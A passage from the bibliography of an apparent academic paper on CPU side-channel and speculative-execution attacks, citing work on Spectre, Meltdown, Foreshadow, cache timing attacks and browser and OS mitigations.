tel flaw lives on, say boffins. Available at https://www.theregister.com/2020/08/07/foreshadow_
strikes_back_boffins_find/.
[5] Ryan Crosby (2018): SpectrePoC. Available at https://github.com/crozone/SpectrePoC.
[6] Jeffrey Friedman (1972): Tempest: A signal problem. NSA Cryptologic Spectrum 35, p. 76.
[7] Ulf Frisk (2018): Total Meltdown? Available at http://blog.frizk.net/2018/03/total-meltdown.
html.
[8] Google: Mitigating Side-Channel Attacks. Available at https://www.chromium.org/Home/
chromium-security/ssca.
[9] Google: Retpoline. Available at https://support.google.com/faqs/answer/7625886.
[10] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice & Stefan Mangard
(2017): Kaslr is dead: long live kaslr. In: International Symposium on Engineering Secure Software
and Systems, Springer, pp. 161–176.
[11] Daniel Gruss, Raphael Spreitzer & Stefan Mangard (2015): Cache template attacks: Automating
attacks on inclusive last-level caches. In: 24th {USENIX} Security Symposium ({USENIX} Security
15), pp. 897–912.
[12] Heise (2018): CPU-Sicherheitslücken Spectre-NG: Updates und Info-Links. Available at https://
www.heise.de/ct/artikel/CPU-Sicherheitsluecken-Spectre-NG-Updates-und-Info-Links-4053268.
html.
[13] Y. Kim, R. Daly, J. Kim, C. Fallin, J. H. Lee, D. Lee, C. Wilkerson, K. Lai & O. Mutlu (2014):
Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors.
In: 2014 ACM/IEEE 41st International Symposium on Computer Architecture (ISCA), pp. 361–372.
[14] Olaf Kirch (2018): Meltdown and Spectre Performance. Available at https://www.suse.com/c/
meltdown-spectre-performance/.
[15] Paul Kocher, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Man-
gard, Thomas Prescher, Michael Schwarz & Yuval Yarom: Spectre Attacks: Exploiting Speculative
Execution.
[16] Paul C Kocher (1996): Timing attacks on implementations of Die-Hellman, RSA, DSS, and other
systems. In: Advances in Cryptology| Crypto, 96, p. 104113.
[17] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul
Kocher, Daniel Genkin, Yuval Yarom & Mike Hamburg: Meltdown.
[18] F. Liu, Y. Yarom, Q. Ge, G. Heiser & R. B. Lee (2015): Last-Level Cache Side-Channel Attacks are
Practical. In: 2015 IEEE Symposium on Security and Privacy, pp. 605–622, doi:10.1109/SP.2015.43.
[19] Microsoft: Mitigating speculative execution side-channel attacks in Microsoft Edge and
Internet Explorer. Available at https://blogs.windows.com/msedgedev/2018/01/03/
speculative-execution-mitigations-microsoft-edge-internet-explorer/.

21
[20] Mozilla: Mitigations landing for new class of timing attack. Available at https://blog.mozilla.
org/security/2018/01/03/mitigations-landing-new-class-timing-attack/.
[21] Dag Arne Osvik, Adi Shamir & Eran Tromer (2006): Cache Attacks and Countermeasures: The
Case of AES. In David Pointcheval, editor: Topics in Cryptology – CT-RSA 2006, Springer Berlin
Heidelberg, Berlin, Heidelberg, pp. 1–20.
[22] James L. Fenton Paul A. Grassi, Michael E. Garcia (2017): NIST Special Publication
800-63-3, Digital Identity Guidelines. National Institute of Standards and Technology,
doi:https://doi.org/10.6028/NIST.SP.800-63-3.
[23] Michael Schwarz, Moritz Lipp, Claudio Canella, Robert Schilling, Florian Kargl & Daniel Gruss
(2020): Context: A generic approach for mitigating spectre. In: Proceedings of the 27th Annual
Network and Distributed System Security Symposium (NDSS20). Internet Society, Reston, VA.
[24] Michael Schwarz, Martin Schwarzl, Moritz Lipp, Jon Masters & Daniel Gruss (2019): Netspectre:
Read arbitrary memory over network. In: European Symposium on Research in Computer Security,
Springer, pp. 279–299.
[25] François-Xavier Standaert (2010): Introduction to side-channel attacks. In: Secure integrated circuits
and systems, Springer, pp. 27–42.
[26] Yukiyasu Tsunoo, Teruo Saito, Tomoyasu Suzaki, Maki Shigeri & Hiroshi Miyauchi (2003): Crypt-
analysis of DES Implemented on Computers with Cache. In Colin D. Walter, Çetin K. Koç &
Christof Paar, editors: Cryptographic Hardware and Embedded Systems - CHES 2003, Springer
Berlin Heidelberg, Berlin, Heidelberg, pp. 62–76.
[27] Jo Van Bulck, Marina Minkin, Ofir Weisse, Daniel Genkin, Baris Kasikci, Frank Piessens, Mark
Silberstein, Thomas F Wenisch, Yuval Yarom & Raoul Strackx (2018): Foreshadow: Extracting the
keys to the intel {SGX} kingdom with transient out-of-order execution. In: 27th {USENIX} Security
Symposium ({USENIX} Security 18), pp. 991–1008.
[28] Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lippi, Marina Minkin, Daniel Genkin,
Yuval Yarom, Berk Sunar, Daniel Gruss & Frank Piessens (2020): LVI: Hijacking transient execution
through microarchitectural load value injection. In: 2020 IEEE Symposium on Security and Privacy
(SP), IEEE, pp. 54–72.
[29] Yuval Yarom & Katrina Falkner (2014): FLUSH+ RELOAD: a high resolution, low noise, L3 cache
side-channel attack. In: 23rd {USENIX} Security Symposium ({USENIX} Security 14), pp. 719–732.

22

You might also like